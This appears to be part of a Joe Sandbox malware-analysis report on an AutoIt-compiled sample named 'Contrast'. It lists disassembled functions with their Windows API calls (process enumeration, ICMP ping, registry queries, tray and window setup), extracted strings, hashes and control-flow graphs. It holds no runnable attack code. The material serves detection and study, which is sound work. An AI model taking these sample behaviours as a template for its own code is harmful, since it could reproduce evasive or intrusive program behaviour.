                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 420147892-0
                                                                                                                                        • Opcode ID: 7cc51f18f8830c85f5df18924fa6e6dd0872f9f703c954188f7ecb32476151b0
                                                                                                                                        • Instruction ID: e6271e83d5debec36da9bc658cf0c868518e978e3cb2f6c58586d3f0aec5c844
                                                                                                                                        • Opcode Fuzzy Hash: 7cc51f18f8830c85f5df18924fa6e6dd0872f9f703c954188f7ecb32476151b0
                                                                                                                                        • Instruction Fuzzy Hash: 3331A7711083419FD304EF50E885AAFBFE8BFE6350F00052DF585821D1EB709A49DB92
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00523740: CharUpperBuffW.USER32(?,005D71DC,00000000,?,00000000,005D71DC,?,005153A5,?,?,?,?), ref: 0052375D
                                                                                                                                        • _memmove.LIBCMT ref: 0051B68A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharUpper_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2819905725-0
                                                                                                                                        • Opcode ID: 5fefda29af727d0d2b779d38edd749507bf3c65df218559b19dd48892199e30b
                                                                                                                                        • Instruction ID: eacfd5bf2a2e470b1b027217f50154f147f0cfa8a9853c0e130c7cc3c32e0de1
                                                                                                                                        • Opcode Fuzzy Hash: 5fefda29af727d0d2b779d38edd749507bf3c65df218559b19dd48892199e30b
                                                                                                                                        • Instruction Fuzzy Hash: 2CA27A74608741DFE720CF24C494BAABBE1BF84344F14895EE89A8B361D771ED85CB92
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 24402283b138e91236599309aea0b0fa4555c59526e97d0b974a64c7535c58cf
                                                                                                                                        • Instruction ID: 418ceff758e6ec89226f87d15c95ae8dac525267d473dea371c9fbe02cc57f56
                                                                                                                                        • Opcode Fuzzy Hash: 24402283b138e91236599309aea0b0fa4555c59526e97d0b974a64c7535c58cf
                                                                                                                                        • Instruction Fuzzy Hash: A122BE74A04206DFEB24DF54C4A4AEEBBF1FF45300F14856AE856AB391E370AD85CB91
                                                                                                                                        APIs
                                                                                                                                        • timeGetTime.WINMM ref: 0051BF57
                                                                                                                                          • Part of subcall function 005152B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005152E6
                                                                                                                                        • Sleep.KERNEL32(0000000A,?,?), ref: 005536B5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePeekSleepTimetime
                                                                                                                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                                                                                                        • API String ID: 1792118007-922114024
                                                                                                                                        • Opcode ID: f21841130001e39f736505681ff95c993ad324304126082599b1fafd20ecc632
                                                                                                                                        • Instruction ID: 3e226710cc7ff120a44dee1e7e5519306339904e38cfc78cd6301d8fcdac0253
                                                                                                                                        • Opcode Fuzzy Hash: f21841130001e39f736505681ff95c993ad324304126082599b1fafd20ecc632
                                                                                                                                        • Instruction Fuzzy Hash: A8C2A470508342DFE724DF24C858BAABFE5BF84344F14491EF88A97291D771E989CB42

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00513444
                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 0051346E
                                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0051347F
                                                                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 0051349C
                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005134AC
                                                                                                                                        • LoadIconW.USER32(000000A9), ref: 005134C2
                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005134D1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                        • API String ID: 2914291525-1005189915
                                                                                                                                        • Opcode ID: 4d3ff8c27cdbe66a8f5028b03f288c747227b8a9c23c522bb5ffb9f44f7e2f75
                                                                                                                                        • Instruction ID: 10de455091582b7fb280784877537967c578ef04f68790992a60c87ebcce05fb
                                                                                                                                        • Opcode Fuzzy Hash: 4d3ff8c27cdbe66a8f5028b03f288c747227b8a9c23c522bb5ffb9f44f7e2f75
                                                                                                                                        • Instruction Fuzzy Hash: 4E3136B1815319AFDB50CFA4EC88ADEBFF0FB1A310F10415AE540A62A0E7B50589EF91

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00513444
                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 0051346E
                                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0051347F
                                                                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 0051349C
                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005134AC
                                                                                                                                        • LoadIconW.USER32(000000A9), ref: 005134C2
                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005134D1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                        • API String ID: 2914291525-1005189915
                                                                                                                                        • Opcode ID: 8d310f31b5602bd18d17690dc46b783a1add32e454a1e1909f41f462c3aeb88f
                                                                                                                                        • Instruction ID: 25b102b3a77566ee8336724e023f79f4093ba90e53db79b148ba8b387cf515a2
                                                                                                                                        • Opcode Fuzzy Hash: 8d310f31b5602bd18d17690dc46b783a1add32e454a1e1909f41f462c3aeb88f
                                                                                                                                        • Instruction Fuzzy Hash: E821E2B191521CAFEB109FA4EC88B9EBFF4FB19700F00511BF511A62A0E7B11548EF95

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005300CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00523094), ref: 005300ED
                                                                                                                                          • Part of subcall function 005308C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0052309F), ref: 005308E3
                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 005230E2
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 005601BA
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 005601FB
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00560239
                                                                                                                                        • _wcscat.LIBCMT ref: 00560292
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                        • API String ID: 2673923337-2727554177
                                                                                                                                        • Opcode ID: 5572108f5159ced7b7ca3628a60c8594b653b3f92e989444476adf55c6f6c487
                                                                                                                                        • Instruction ID: 1e3c58475aca5801140dfaf2f1fd08906663a6b68a3e178f02056758b1ba8591
                                                                                                                                        • Opcode Fuzzy Hash: 5572108f5159ced7b7ca3628a60c8594b653b3f92e989444476adf55c6f6c487
                                                                                                                                        • Instruction Fuzzy Hash: 7E715B7540A7129EC324EF25E89996BBFE8FFA5350F80052FF445832A0EF309948DB56

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00525156
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00525165
                                                                                                                                        • LoadIconW.USER32(00000063), ref: 0052517C
                                                                                                                                        • LoadIconW.USER32(000000A4), ref: 0052518E
                                                                                                                                        • LoadIconW.USER32(000000A2), ref: 005251A0
                                                                                                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005251C6
                                                                                                                                        • RegisterClassExW.USER32(?), ref: 0052521C
                                                                                                                                          • Part of subcall function 00513411: GetSysColorBrush.USER32(0000000F), ref: 00513444
                                                                                                                                          • Part of subcall function 00513411: RegisterClassExW.USER32(00000030), ref: 0051346E
                                                                                                                                          • Part of subcall function 00513411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0051347F
                                                                                                                                          • Part of subcall function 00513411: InitCommonControlsEx.COMCTL32(?), ref: 0051349C
                                                                                                                                          • Part of subcall function 00513411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005134AC
                                                                                                                                          • Part of subcall function 00513411: LoadIconW.USER32(000000A9), ref: 005134C2
                                                                                                                                          • Part of subcall function 00513411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005134D1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                                                        • API String ID: 423443420-4155596026
                                                                                                                                        • Opcode ID: 8222ae2b7752fb80185ab391cf9154ab737902c6daf37c2b9c9562bf3bb4a936
                                                                                                                                        • Instruction ID: 5965da18938c8688176a33a1e53bdae52e081e83b413fe9aac7513bae93cd959
                                                                                                                                        • Opcode Fuzzy Hash: 8222ae2b7752fb80185ab391cf9154ab737902c6daf37c2b9c9562bf3bb4a936
                                                                                                                                        • Instruction Fuzzy Hash: BB215774916358AFEB209FA4ED09B9D7FB4FB2D311F00415BF504A62E0E3B25558AF80

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 922 585e1d-585e54 call 514dc0 925 585e74-585e86 WSAStartup 922->925 926 585e56-585e63 call 51502b 922->926 928 585e88-585e98 call 567135 925->928 929 585e9d-585edb call 5240cd call 514d37 call 52402a inet_addr gethostbyname 925->929 926->925 933 585e65-585e70 call 51502b 926->933 937 585ff6-585ffe 928->937 943 585eec-585efc call 567135 929->943 944 585edd-585eea IcmpCreateFile 929->944 933->925 949 585fed-585ff1 call 521cb6 943->949 944->943 945 585f01-585f32 call 530fe6 call 52433f 944->945 954 585f34-585f53 IcmpSendEcho 945->954 955 585f55-585f69 IcmpSendEcho 945->955 949->937 956 585f6d-585f6f 954->956 955->956 957 585f71-585f76 956->957 958 585fa2-585fa4 956->958 960 585f78-585f7d 957->960 961 585fba-585fcc call 514dc0 957->961 959 585fa6-585fb2 call 567135 958->959 971 585fd4-585fe8 IcmpCloseHandle WSACleanup call 5245ae 959->971 964 585f7f-585f84 960->964 965 585fb4-585fb8 960->965 972 585fce-585fd0 961->972 973 585fd2 961->973 964->958 966 585f86-585f8b 964->966 965->959 969 585f9a-585fa0 966->969 970 585f8d-585f92 966->970 969->959 970->965 974 585f94-585f98 970->974 971->949 972->971 973->971 974->959
                                                                                                                                        APIs
                                                                                                                                        • WSAStartup.WS2_32(00000101,?), ref: 00585E7E
                                                                                                                                        • inet_addr.WSOCK32(?,?,?), ref: 00585EC3
                                                                                                                                        • gethostbyname.WS2_32(?), ref: 00585ECF
                                                                                                                                        • IcmpCreateFile.IPHLPAPI ref: 00585EDD
                                                                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00585F4D
                                                                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00585F63
                                                                                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00585FD8
                                                                                                                                        • WSACleanup.WSOCK32 ref: 00585FDE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                        • String ID: Ping
                                                                                                                                        • API String ID: 1028309954-2246546115
                                                                                                                                        • Opcode ID: 059b12c06114b9f8599c892a89d2517e801e95747f8563608e61ca98c7f8231a
                                                                                                                                        • Instruction ID: d610440a9313551d1272bb2d2002a502a49ac6afb1fe9342f406e2ba7ac739ef
                                                                                                                                        • Opcode Fuzzy Hash: 059b12c06114b9f8599c892a89d2517e801e95747f8563608e61ca98c7f8231a
                                                                                                                                        • Instruction Fuzzy Hash: A051B1716046019FD710EF24DC49B2ABBE4FF89710F044969FA95EB2E0EB30E944DB42

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 976 524d83-524dd1 978 524dd3-524dd6 976->978 979 524e31-524e33 976->979 981 524e37 978->981 982 524dd8-524ddf 978->982 979->978 980 524e35 979->980 983 524e1a-524e22 DefWindowProcW 980->983 984 5609c2-5609f0 call 51c460 call 51c483 981->984 985 524e3d-524e40 981->985 986 524de5-524dea 982->986 987 524ead-524eb5 PostQuitMessage 982->987 989 524e28-524e2e 983->989 1020 5609f5-5609fc 984->1020 991 524e42-524e43 985->991 992 524e65-524e8c SetTimer RegisterWindowMessageW 985->992 993 524df0-524df2 986->993 994 560a35-560a49 call 572cce 986->994 990 524e61-524e63 987->990 990->989 1000 560965-560968 991->1000 1001 524e49-524e5c KillTimer call 525ac3 call 5134e4 991->1001 992->990 995 524e8e-524e99 CreatePopupMenu 992->995 996 524eb7-524ec1 call 525b29 993->996 997 524df8-524dfd 993->997 994->990 1012 560a4f 994->1012 995->990 1014 524ec6 996->1014 1002 524e03-524e08 997->1002 1003 560a1a-560a21 997->1003 1007 56099e-5609bd MoveWindow 1000->1007 1008 56096a-56096c 1000->1008 1001->990 1010 524e9b-524eab call 525bd7 1002->1010 1011 524e0e-524e14 1002->1011 1003->983 1018 560a27-560a30 call 568854 1003->1018 1007->990 1015 56096e-560971 1008->1015 1016 56098d-560999 SetFocus 1008->1016 1010->990 1011->983 1011->1020 1012->983 1014->990 1015->1011 1021 560977-560988 call 51c460 1015->1021 1016->990 1018->983 1020->983 1025 560a02-560a15 call 525ac3 call 5259d3 1020->1025 1021->990 1025->983
                                                                                                                                        APIs
                                                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00524E22
                                                                                                                                        • KillTimer.USER32(?,00000001), ref: 00524E4C
                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00524E6F
                                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00524E7A
                                                                                                                                        • CreatePopupMenu.USER32 ref: 00524E8E
                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00524EAF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                        • String ID: TaskbarCreated
                                                                                                                                        • API String ID: 129472671-2362178303
                                                                                                                                        • Opcode ID: 54ef3417d03102d2ffdc096a0ebbb4f304eb42fa8cbe396e8c6b734ebddceb59
                                                                                                                                        • Instruction ID: b863d246faa189fdb2ed848128c65e7e6e1a1ba57227fa89064eb5318f8f79bd
                                                                                                                                        • Opcode Fuzzy Hash: 54ef3417d03102d2ffdc096a0ebbb4f304eb42fa8cbe396e8c6b734ebddceb59
                                                                                                                                        • Instruction Fuzzy Hash: AC41F63115816AABFB255F28AC0DB7E3E99FF56300F050917F502922E1EB719C54AB62

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00560C5B
                                                                                                                                          • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                                                                                                                                        • _memset.LIBCMT ref: 00525787
                                                                                                                                        • _wcscpy.LIBCMT ref: 005257DB
                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005257EB
                                                                                                                                        • __swprintf.LIBCMT ref: 00560CD1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                                                                                                        • String ID: Line %d: $AutoIt -
                                                                                                                                        • API String ID: 230667853-4094128768
                                                                                                                                        • Opcode ID: 6cae46a892b5563f66b58f1d4eb2131faf1eec6b85731de53c7ec0ff4953081b
                                                                                                                                        • Instruction ID: 2c56f15664d64d3dcc784a426d1d45e2146e497547c37ace11a1d2899b4079ca
                                                                                                                                        • Opcode Fuzzy Hash: 6cae46a892b5563f66b58f1d4eb2131faf1eec6b85731de53c7ec0ff4953081b
                                                                                                                                        • Instruction Fuzzy Hash: D441A471008715AAD321EB60EC89AEF7FDCBFA6350F044A1EF185920E1EB309649C796

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005307BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 005307EC
                                                                                                                                          • Part of subcall function 005307BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 005307F4
                                                                                                                                          • Part of subcall function 005307BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 005307FF
                                                                                                                                          • Part of subcall function 005307BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0053080A
                                                                                                                                          • Part of subcall function 005307BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00530812
                                                                                                                                          • Part of subcall function 005307BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 0053081A
                                                                                                                                          • Part of subcall function 0052FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0051AC6B), ref: 0052FFA7
                                                                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0051AD08
                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 0051AD85
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00552F56
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                        • String ID: <w]$\t]$s]
                                                                                                                                        • API String ID: 1986988660-1717686022
                                                                                                                                        • Opcode ID: 58911f58bb9c76502c1337dc0c57b48d404a2d70f88ecc764f8b5bc2be094593
                                                                                                                                        • Instruction ID: 0f9cbd8846c44e7fde0d04cd06231996028fdc7a981db89b215098401d4d8bdc
                                                                                                                                        • Opcode Fuzzy Hash: 58911f58bb9c76502c1337dc0c57b48d404a2d70f88ecc764f8b5bc2be094593
                                                                                                                                        • Instruction Fuzzy Hash: 6381CAB090A2598F8BA6DF29AD456197FE8FBAD304740896BE419C73B1F7304408AF55

